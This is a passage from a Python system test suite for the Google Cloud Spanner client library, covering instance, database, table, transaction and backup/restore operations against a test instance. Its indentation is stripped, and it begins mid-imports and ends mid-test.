from google.cloud.spanner_v1.table import Table
from google.cloud.spanner_v1 import RequestOptions
from test_utils.retry import RetryErrors
from test_utils.retry import RetryInstanceState
from test_utils.retry import RetryResult
from test_utils.system import unique_resource_id
from tests._fixtures import DDL_STATEMENTS
from tests._fixtures import EMULATOR_DDL_STATEMENTS
from tests._helpers import OpenTelemetryBase, HAS_OPENTELEMETRY_INSTALLED
CREATE_INSTANCE = os.getenv("GOOGLE_CLOUD_TESTS_CREATE_SPANNER_INSTANCE") is not None
USE_EMULATOR = os.getenv("SPANNER_EMULATOR_HOST") is not None
SKIP_BACKUP_TESTS = os.getenv("SKIP_BACKUP_TESTS") is not None
SPANNER_OPERATION_TIMEOUT_IN_SECONDS = int(
os.getenv("SPANNER_OPERATION_TIMEOUT_IN_SECONDS", 60)
)
if CREATE_INSTANCE:
INSTANCE_ID = "google-cloud" + unique_resource_id("-")
else:
INSTANCE_ID = os.environ.get(
"GOOGLE_CLOUD_TESTS_SPANNER_INSTANCE", "google-cloud-python-systest"
)
MULTI_REGION_INSTANCE_ID = "multi-region" + unique_resource_id("-")
EXISTING_INSTANCES = []
COUNTERS_TABLE = "counters"
COUNTERS_COLUMNS = ("name", "value")
BASE_ATTRIBUTES = {
"db.type": "spanner",
"db.url": "spanner.googleapis.com",
"net.host.name": "spanner.googleapis.com",
}
_STATUS_CODE_TO_GRPC_STATUS_CODE = {
member.value[0]: member for member in grpc.StatusCode
}
class Config(object):
"""Run-time configuration to be modified at set-up.
This is a mutable stand-in to allow test set-up to modify
global state.
"""
CLIENT = None
INSTANCE_CONFIG = None
INSTANCE = None
def _has_all_ddl(database):
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
return len(database.ddl_statements) == len(ddl_statements)
def _list_instances():
return list(Config.CLIENT.list_instances())
def setUpModule():
if USE_EMULATOR:
from google.auth.credentials import AnonymousCredentials
emulator_project = os.getenv("GCLOUD_PROJECT", "emulator-test-project")
Config.CLIENT = Client(
project=emulator_project, credentials=AnonymousCredentials()
)
else:
Config.CLIENT = Client()
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
instances = retry(_list_instances)()
EXISTING_INSTANCES[:] = instances
# Delete test instances that are older than an hour.
cutoff = int(time.time()) - 1 * 60 * 60
instance_pbs = Config.CLIENT.list_instances("labels.python-spanner-systests:true")
for instance_pb in instance_pbs:
instance = Instance.from_pb(instance_pb, Config.CLIENT)
if "created" not in instance.labels:
continue
create_time = int(instance.labels["created"])
if create_time > cutoff:
continue
# Instance cannot be deleted while backups exist.
for backup_pb in instance.list_backups():
backup = Backup.from_pb(backup_pb, instance)
backup.delete()
instance.delete()
if CREATE_INSTANCE:
if not USE_EMULATOR:
# Defend against back-end returning configs for regions we aren't
# actually allowed to use.
configs = [config for config in configs if "-us-" in config.name]
if not configs:
raise ValueError("List instance configs failed in module set up.")
Config.INSTANCE_CONFIG = configs[0]
config_name = configs[0].name
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
Config.INSTANCE = Config.CLIENT.instance(
INSTANCE_ID, config_name, labels=labels
)
created_op = Config.INSTANCE.create()
created_op.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # block until completion
else:
Config.INSTANCE = Config.CLIENT.instance(INSTANCE_ID)
Config.INSTANCE.reload()
def tearDownModule():
if CREATE_INSTANCE:
Config.INSTANCE.delete()
class TestInstanceAdminAPI(unittest.TestCase):
def setUp(self):
self.instances_to_delete = []
def tearDown(self):
for instance in self.instances_to_delete:
instance.delete()
@unittest.skipIf(
CREATE_INSTANCE, "This test fails when system tests are run in parallel."
)
def test_list_instances(self):
instances = list(Config.CLIENT.list_instances())
# We have added one new instance in `setUpModule`.
if CREATE_INSTANCE:
self.assertEqual(len(instances), len(EXISTING_INSTANCES) + 1)
for instance in instances:
instance_existence = (
instance in EXISTING_INSTANCES or instance == Config.INSTANCE
)
self.assertTrue(instance_existence)
def test_reload_instance(self):
# Use same arguments as Config.INSTANCE (created in `setUpModule`)
# so we can use reload() on a fresh instance.
instance = Config.CLIENT.instance(INSTANCE_ID)
# Make sure metadata unset before reloading.
instance.display_name = None
def _expected_display_name(instance):
return instance.display_name == Config.INSTANCE.display_name
retry = RetryInstanceState(_expected_display_name)
retry(instance.reload)()
self.assertEqual(instance.display_name, Config.INSTANCE.display_name)
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
instance = Config.CLIENT.instance(ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
# Create a new instance instance and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
@unittest.skipIf(USE_EMULATOR, "Skipping LCI tests")
@unittest.skipUnless(CREATE_INSTANCE, "Skipping instance creation")
def test_create_instance_with_processing_nodes(self):
ALT_INSTANCE_ID = "new" + unique_resource_id("-")
PROCESSING_UNITS = 5000
instance = Config.CLIENT.instance(
instance_id=ALT_INSTANCE_ID,
configuration_name=Config.INSTANCE_CONFIG.name,
processing_units=PROCESSING_UNITS,
)
operation = instance.create()
# Make sure this instance gets deleted after the test case.
self.instances_to_delete.append(instance)
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
# Create a new instance instance and make sure it is the same.
instance_alt = Config.CLIENT.instance(
ALT_INSTANCE_ID, Config.INSTANCE_CONFIG.name
)
instance_alt.reload()
self.assertEqual(instance, instance_alt)
self.assertEqual(instance.display_name, instance_alt.display_name)
self.assertEqual(instance.processing_units, instance_alt.processing_units)
@unittest.skipIf(USE_EMULATOR, "Skipping updating instance")
def test_update_instance(self):
OLD_DISPLAY_NAME = Config.INSTANCE.display_name
NEW_DISPLAY_NAME = "Foo Bar Baz"
Config.INSTANCE.display_name = NEW_DISPLAY_NAME
operation = Config.INSTANCE.update()
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
# Create a new instance instance and reload it.
instance_alt = Config.CLIENT.instance(INSTANCE_ID, None)
self.assertNotEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
instance_alt.reload()
self.assertEqual(instance_alt.display_name, NEW_DISPLAY_NAME)
# Make sure to put the instance back the way it was for the
# other test cases.
Config.INSTANCE.display_name = OLD_DISPLAY_NAME
Config.INSTANCE.update()
class _TestData(object):
TABLE = "contacts"
COLUMNS = ("contact_id", "first_name", "last_name", "email")
ROW_DATA = (
(1, u"Phred", u"Phlyntstone", u"phred@example.com"),
(2, u"Bharney", u"Rhubble", u"bharney@example.com"),
(3, u"Wylma", u"Phlyntstone", u"wylma@example.com"),
)
ALL = KeySet(all_=True)
SQL = "SELECT * FROM contacts ORDER BY contact_id"
_recurse_into_lists = True
def _assert_timestamp(self, value, nano_value):
self.assertIsInstance(value, datetime.datetime)
self.assertIsNone(value.tzinfo)
self.assertIs(nano_value.tzinfo, UTC)
self.assertEqual(value.year, nano_value.year)
self.assertEqual(value.month, nano_value.month)
self.assertEqual(value.day, nano_value.day)
self.assertEqual(value.hour, nano_value.hour)
self.assertEqual(value.minute, nano_value.minute)
self.assertEqual(value.second, nano_value.second)
self.assertEqual(value.microsecond, nano_value.microsecond)
if isinstance(value, DatetimeWithNanoseconds):
self.assertEqual(value.nanosecond, nano_value.nanosecond)
else:
self.assertEqual(value.microsecond * 1000, nano_value.nanosecond)
def _check_rows_data(self, rows_data, expected=None):
if expected is None:
expected = self.ROW_DATA
self.assertEqual(len(rows_data), len(expected))
for row, expected in zip(rows_data, expected):
self._check_row_data(row, expected)
def _check_row_data(self, row_data, expected):
self.assertEqual(len(row_data), len(expected))
for found_cell, expected_cell in zip(row_data, expected):
self._check_cell_data(found_cell, expected_cell)
def _check_cell_data(self, found_cell, expected_cell):
if isinstance(found_cell, DatetimeWithNanoseconds):
self._assert_timestamp(expected_cell, found_cell)
elif isinstance(found_cell, float) and math.isnan(found_cell):
self.assertTrue(math.isnan(expected_cell))
elif isinstance(found_cell, list) and self._recurse_into_lists:
self.assertEqual(len(found_cell), len(expected_cell))
for found_item, expected_item in zip(found_cell, expected_cell):
self._check_cell_data(found_item, expected_item)
else:
self.assertEqual(found_cell, expected_cell)
class TestDatabaseAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
# Create a multi-region instance
multi_region_config = "nam3"
config_name = "{}/instanceConfigs/{}".format(
Config.CLIENT.project_name, multi_region_config
)
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._instance = Config.CLIENT.instance(
instance_id=MULTI_REGION_INSTANCE_ID,
configuration_name=config_name,
labels=labels,
)
operation = cls._instance.create()
operation.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
@classmethod
def tearDownClass(cls):
cls._db.drop()
cls._instance.delete()
def setUp(self):
self.to_delete = []
def tearDown(self):
for doomed in self.to_delete:
doomed.drop()
def test_list_databases(self):
# Since `Config.INSTANCE` is newly created in `setUpModule`, the
# database created in `setUpClass` here will be the only one.
database_names = [
database.name for database in Config.INSTANCE.list_databases()
]
self.assertTrue(self._db.name in database_names)
def test_create_database(self):
pool = BurstyPool(labels={"testcase": "create_database"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_create_database_pitr_invalid_retention_period(self):
pool = BurstyPool(labels={"testcase": "create_database_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "0d"
ddl_statements = [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
temp_db = Config.INSTANCE.database(
temp_db_id, pool=pool, ddl_statements=ddl_statements
)
with self.assertRaises(exceptions.InvalidArgument):
temp_db.create()
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_create_database_pitr_success(self):
pool = BurstyPool(labels={"testcase": "create_database_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "7d"
ddl_statements = [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
temp_db = Config.INSTANCE.database(
temp_db_id, pool=pool, ddl_statements=ddl_statements
)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
temp_db.reload()
self.assertEqual(temp_db.version_retention_period, retention_period)
with temp_db.snapshot() as snapshot:
results = snapshot.execute_sql(
"SELECT OPTION_VALUE AS version_retention_period "
"FROM INFORMATION_SCHEMA.DATABASE_OPTIONS "
"WHERE SCHEMA_NAME = '' AND OPTION_NAME = 'version_retention_period'"
)
for result in results:
self.assertEqual(result[0], retention_period)
@unittest.skipIf(
USE_EMULATOR, "Default leader setting is not supported by the emulator"
)
def test_create_database_with_default_leader_success(self):
pool = BurstyPool(labels={"testcase": "create_database_default_leader"})
temp_db_id = "temp_db" + unique_resource_id("_")
default_leader = "us-east4"
ddl_statements = [
"ALTER DATABASE {}"
" SET OPTIONS (default_leader = '{}')".format(temp_db_id, default_leader)
]
temp_db = self._instance.database(
temp_db_id, pool=pool, ddl_statements=ddl_statements
)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in self._instance.list_databases()]
self.assertIn(temp_db.name, database_ids)
temp_db.reload()
self.assertEqual(temp_db.default_leader, default_leader)
with temp_db.snapshot() as snapshot:
results = snapshot.execute_sql(
"SELECT OPTION_VALUE AS default_leader "
"FROM INFORMATION_SCHEMA.DATABASE_OPTIONS "
"WHERE SCHEMA_NAME = '' AND OPTION_NAME = 'default_leader'"
)
for result in results:
self.assertEqual(result[0], default_leader)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_update_database_ddl_pitr_invalid(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "0d"
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
self.assertIsNone(temp_db.version_retention_period)
ddl_statements = DDL_STATEMENTS + [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
with self.assertRaises(exceptions.InvalidArgument):
temp_db.update_ddl(ddl_statements)
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_update_database_ddl_pitr_success(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "7d"
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
self.assertIsNone(temp_db.version_retention_period)
ddl_statements = DDL_STATEMENTS + [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
operation = temp_db.update_ddl(ddl_statements)
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(temp_db.version_retention_period, retention_period)
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
@unittest.skipIf(
USE_EMULATOR, "Default leader update is not supported by the emulator"
)
def test_update_database_ddl_default_leader_success(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl_default_leader"})
temp_db_id = "temp_db" + unique_resource_id("_")
default_leader = "us-east4"
temp_db = self._instance.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
self.assertIsNone(temp_db.default_leader)
ddl_statements = DDL_STATEMENTS + [
"ALTER DATABASE {}"
" SET OPTIONS (default_leader = '{}')".format(temp_db_id, default_leader)
]
operation = temp_db.update_ddl(ddl_statements)
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(temp_db.default_leader, default_leader)
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
class TestTableAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(30) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def test_exists(self):
table = Table("all_types", self._db)
self.assertTrue(table.exists())
def test_exists_not_found(self):
table = Table("table_does_not_exist", self._db)
self.assertFalse(table.exists())
def test_list_tables(self):
tables = self._db.list_tables()
table_ids = set(table.table_id for table in tables)
self.assertIn("contacts", table_ids)
self.assertIn("contact_phones", table_ids)
self.assertIn("all_types", table_ids)
def test_list_tables_reload(self):
tables = self._db.list_tables()
for table in tables:
self.assertTrue(table.exists())
schema = table.schema
self.assertIsInstance(schema, list)
def test_reload_not_found(self):
table = Table("table_does_not_exist", self._db)
with self.assertRaises(exceptions.NotFound):
table.reload()
def test_schema(self):
table = Table("all_types", self._db)
schema = table.schema
names_and_types = set((field.name, field.type_.code) for field in schema)
self.assertIn(("pkey", TypeCode.INT64), names_and_types)
self.assertIn(("int_value", TypeCode.INT64), names_and_types)
self.assertIn(("int_array", TypeCode.ARRAY), names_and_types)
self.assertIn(("bool_value", TypeCode.BOOL), names_and_types)
self.assertIn(("bytes_value", TypeCode.BYTES), names_and_types)
self.assertIn(("date_value", TypeCode.DATE), names_and_types)
self.assertIn(("float_value", TypeCode.FLOAT64), names_and_types)
self.assertIn(("string_value", TypeCode.STRING), names_and_types)
self.assertIn(("timestamp_value", TypeCode.TIMESTAMP), names_and_types)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
from datetime import datetime
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS) # raises on failure / timeout.
op2.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS) # raises on failure / timeout.
cls.database_version_time = datetime.utcnow().replace(tzinfo=UTC)
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config, labels=labels
)
op = cls._same_config_instance.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0], labels=labels
)
op = cls._diff_config_instance.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from google.cloud.spanner_admin_database_v1 import (
CreateBackupEncryptionConfig,
EncryptionConfig,
EncryptionInfo,
RestoreDatabaseEncryptionConfig,
)
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
encryption_config = CreateBackupEncryptionConfig(
encryption_type=CreateBackupEncryptionConfig.EncryptionType.GOOGLE_DEFAULT_ENCRYPTION,
)
# Create backup.
backup = instance.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=self.database_version_time,
encryption_config=encryption_config,
)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertEqual(self.database_version_time, backup.version_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
self.assertEqual(
EncryptionInfo.Type.GOOGLE_DEFAULT_ENCRYPTION,
backup.encryption_info.encryption_type,
)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
encryption_config = RestoreDatabaseEncryptionConfig(
encryption_type=RestoreDatabaseEncryptionConfig.EncryptionType.GOOGLE_DEFAULT_ENCRYPTION,
)
database = instance.database(restored_id, encryption_config=encryption_config)
self.to_drop.append(database)
operation = database.restore(source=backup)
restored_db = operation.result()
self.assertEqual(
self.database_version_time,
restored_db.restore_info.backup_info.version_time,
)
metadata = operation.metadata
self.assertEqual(self.database_version_time, metadata.backup_info.version_time)
database.reload()
expected_encryption_config = EncryptionConfig()
self.assertEqual(expected_encryption_config, database.encryption_config)
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_backup_version_time_defaults_to_create_time(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time,)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertIsNotNone(backup.create_time)
self.assertEqual(backup.create_time, backup.version_time)
backup.delete()
self.assertFalse(backup.exists())
def test_create_backup_invalid_version_time_past(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
version_time = datetime.utcnow() - timedelta(days=10)
version_time = version_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=version_time,
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_create_backup_invalid_version_time_future(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
version_time = datetime.utcnow() + timedelta(days=2)
version_time = version_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=version_time,
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
invalid_expire_time = datetime.now() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
if self._diff_config_instance is not None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
